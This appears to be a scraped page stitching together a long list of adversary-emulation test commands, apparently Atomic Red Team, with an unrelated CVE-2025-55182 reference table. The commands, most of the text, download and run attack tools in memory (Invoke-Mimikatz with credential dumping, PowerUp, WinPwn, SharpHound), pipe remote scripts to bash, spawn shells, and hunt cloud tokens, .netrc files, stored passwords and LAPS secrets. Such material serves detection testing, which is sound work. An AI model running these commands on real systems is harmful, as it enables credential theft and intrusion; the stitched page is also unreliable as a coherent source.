if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-55182 |
| facebook.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.facebook.com/security/advisories/cve-2025-55182 |
| react.dev |
GitHub CVE
x_refsource_CONFIRM
|
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components |
| openwall.com |
NVD API
Mailing List
Patch
Third Party Advisory
|
http://www.openwall.com/lists/oss-security/2025/12/03/4 |
| news.ycombinator.com |
NVD API
Issue Tracking
|
https://news.ycombinator.com/item?id=46136026 |
| aws.amazon.com |
NVD API
Third Party Advisory
|
https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-55182 |